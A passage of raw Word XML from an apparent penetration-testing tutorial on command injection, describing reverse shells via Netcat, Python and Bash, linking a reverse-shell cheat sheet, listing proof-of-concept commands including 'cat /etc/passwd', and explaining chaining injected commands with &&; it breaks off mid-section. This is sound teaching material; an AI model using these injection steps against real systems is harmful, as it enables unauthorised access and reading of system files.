      <w:r>
        <w:t>Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480C7F2D" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Depending on the functionality of the web application, it will require some sort of interaction with the underlying host system this is usually done by passing in raw system commands or input to a command shell(either directly or through some sort of library). Examples of when web applications interact with host systems involve:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2277B44C" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1800"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Checking monitoring statistics e.g. RAM being used, free disk space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654C7E01" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1800"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>File conversion processes e.g. the web application would receive an image file that it wants to convert to a different image type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428AE79F" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1800"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Leaving debug functionality open; some frameworks have optional debug functionality that involve interaction with the underlying file system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E490E2" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C970AF1" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Any input that is controlled by a user shouldn’t be trusted by the server. User input could be manipulated. In the case of when a web application uses system commands, a user could manipulate input to execute arbitrary system commands. This type of an attack is called a command injection attack. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198B750D" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="161641BA" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>What Do You Do When You Have Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE4336A" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Command Injection attacks are considered extremely dangerous; they essentially allow an attacker to execute commands on a system. The most common thing to do when discovering you have a command injection attack is getting a reverse shell. Reverse shells can be thought of as backdoors. When an attacker creates this reverse shell, the target server acts as a client, executes command sent by an attacker, and sometimes sends the output of the command back to the attacker. An attacker would usually use system resources on the target to create a shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43956836" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1800"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CBBF73" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1800"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047C84D5" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1800"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3800A1FE" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B53531C" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="007A6E65" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:hyperlink r:id="rId142" w:history="1">
        <w:r w:rsidR="00737B45">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00737B45">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> - this is a good resource to use different programs to create a reverse shell. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A817BD" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49A37AD6" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">N.B. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reverse shells tend to be extreme(and sometimes destructive). To demonstrate a proof of concept, you can usually execute the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAC4108" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1800"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>id - gives the ID of the machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4788DA" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1800"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cat /etc/passwd - prints out a list of current users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0959EED6" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1800"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hostname - shows the hostname of the computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2C40D6" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EC03B50" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Variants of Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB069A4" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Like we mentioned above, an application can interact with the underlying system in different ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD1A2E8" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1800"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The application may just ask users to input commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E634817" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="2520"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="2520"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This is the best case scenario and tends to be very rare. All you would have to do is just enter a command and the web application will execute it on the underlying system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D181D6" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1800"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The application filters allowed commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6E9C4C" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="2520"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="2520"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>This tends to be more common than the previous issue. For example, an application may only accept the ping command. You would have to enumerate what commands are allowed and try to use the allowed command to exfiltrate data </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776EFA3B" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1800"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The application takes input to a command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7782AC7B" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="2520"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="2520"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This is even more common. An example is that an application takes input to the ping command(an IP address) and passes this input to the ping command on the backend. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1FDF0C" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="2520"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="2520"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If the input isn’t encoded or filtered, you can actually uses this to run other commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BCACA5" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="2160"/>
          <w:tab w:val="num" w:pos="3240"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="3240"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The &amp;&amp; operator is used with more than one command e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ls &amp;&amp; pwd. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The second command only executes if the first command </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">the second command is successful. You can pass an input containing &amp;&amp; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>other-command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the backend would successfully execute it if both commands ran successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21381554" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="2160"/>
          <w:tab w:val="num" w:pos="3240"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="3240"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
